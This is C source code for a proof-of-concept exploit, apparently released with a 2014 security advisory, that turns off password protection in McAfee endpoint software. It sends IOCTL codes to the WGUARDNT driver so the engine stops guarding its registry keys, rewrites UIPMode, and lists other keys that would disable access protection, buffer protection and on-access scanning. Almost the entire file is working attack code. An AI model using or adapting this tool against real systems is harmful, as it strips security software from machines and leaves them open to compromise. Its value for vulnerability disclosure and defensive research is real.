/***************************************************************************** * * * McAfee Data Protector "Unprotector" * * * * A little tool to request McAfee scan engine to disable password * * protection. * * * * Advisory: http://lab.mediaservice.net/advisory/2014-01-mcafee.txt * * * * This program can be compiled with MinGW (http://www.mingw.org/) * * * * Copyright (c) 2014 @ Mediaservice.net Srl. All rights reserved * * Wrote by Maurizio Agazzini * * * * This program is free software; you can redistribute it and/or * * modify it under the terms of the GNU General Public License * * as published by the Free Software Foundation; either version 2 * * of the License, or (at your option) any later version. * * * * This program is distributed in the hope that it will be useful, * * but WITHOUT ANY WARRANTY; without even the implied warranty of * * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * * GNU General Public License for more details. * * * * You should have received a copy of the GNU General Public License * * along with this program; if not, write to the Free Software * * Foundation, Inc., 59 Temple Place * * Suite 330, Boston, MA 02111-1307, USA. * * * *****************************************************************************/ #include #include HANDLE opendevice() { HANDLE result; if((result = CreateFile("\\\\.\\WGUARDNT", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL) ) == NULL) if((result = CreateFile("\\\\.\\Global\\WGUARDNT", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL) ) == NULL) if((result = CreateFile("\\\\.\\WGUARDNT", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL) ) == NULL) if((result = CreateFile("\\\\.\\Global\\WGUARDNT", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL) ) == NULL) result = 0; return result; } void main(int argc, char ** argv) { HKEY reg_key = NULL; HANDLE p; DWORD BytesReturned; DWORD data = 0; unsigned long size = 4; DWORD type = REG_DWORD; DWORD data1 = 0; char status[4][70]= { "No password", "Password protection for all items listed", "Password protection for the selected items", "Password protection for conformance to Common Criteria" }; printf("\n *******************************************\n"); printf(" * McAfee Desktop Protection \"Unprotector\" *\n"); printf(" *******************************************\n\n"); /* * The PoC use HKLM\SOFTWARE\McAfee\DesktopProtection\UIPMode registry key to * disable the password protection, but you can also access to others useful * keys. * * User Password * HKLM\SOFTWARE\McAfee\DesktopProtection\UIP * HKLM\SOFTWARE\McAfee\DesktopProtection\UIPEx * * Buffer protection * HKLM\SOFTWARE\McAfee\SystemCore\VSCore\On Access Scanner\BehaviourBlocking\BOPEnabled * * Access protection * HKLM\SOFTWARE\McAfee\SystemCore\VSCore\On Access Scanner\BehaviourBlocking\APEnabled * * On Access Scanner * HKLM\SOFTWARE\McAfee\DesktopProtection\OASState * HKLM\SOFTWARE\McAfee\SystemCore\VSCore\On Access Scanner\McShield\Configuration\OASEnabled * * Others * HKLM\SOFTWARE\McAfee\SystemCore\VSCore\LockDownEnabled * */ if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, "SOFTWARE\\McAfee\\DesktopProtection", 0, KEY_QUERY_VALUE | KEY_READ | 0x0200, ®_key) != ERROR_SUCCESS) { if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, "SOFTWARE\\\Wow6432Node\McAfee\\DesktopProtection", 0, KEY_QUERY_VALUE | KEY_READ | 0x0200, ®_key) != ERROR_SUCCESS) { printf("Error opening registry key...\n"); return; } } // Check current status of McAfee protection RegQueryValueEx(reg_key,"UIPMode",NULL, &type,(BYTE *)&data,&size); printf(" [+] Current UIPMode = %d (%s)\n\n", data, status[data]); RegCloseKey (reg_key); // Open McAfee magic device p = opendevice(); printf(" [-] Please John, let me write to your registry keys..."); // Request to the scan engine to stop protect registry keys DeviceIoControl(p, 0x9EDB6510u, 0, 0, 0, 0, &BytesReturned, 0); if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, "SOFTWARE\\McAfee\\DesktopProtection", 0, KEY_QUERY_VALUE | KEY_READ | KEY_SET_VALUE, ®_key) != ERROR_SUCCESS) if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, "SOFTWARE\\McAfee\\DesktopProtection", 0, KEY_QUERY_VALUE | KEY_READ | KEY_SET_VALUE, ®_key) != ERROR_SUCCESS) { printf(" hmmm hmmm something went wrong!\n\n"); printf(" [-] Ok John, take the control again!\n"); DeviceIoControl(p, 0x9EDB6514u, 0, 0, 0, 0, &BytesReturned, 0); CloseHandle(p); return; } printf(" OK\n"); data1 = 0; if( argc > 1 ) data1 = atoi(argv[1]); // Disable McAfee protection if( RegSetValueEx(reg_key, "UIPMode", 0, REG_DWORD, (CONST BYTE *)&data1, sizeof(DWORD)) != ERROR_SUCCESS) printf("\n hmmm hmmm something went wrong!\n"); else printf("\n [+] Thank you! now we got the control! UIPMode = %d\n",data1); RegCloseKey (reg_key); printf("\n [+] Run \"%s %d\" to get original settings\n\n",argv[0],data); // Tell to engine to take control again printf(" [-] Ok John, take the control again!\n"); DeviceIoControl(p, 0x9EDB6514u, 0, 0, 0, 0, &BytesReturned, 0); CloseHandle(p); }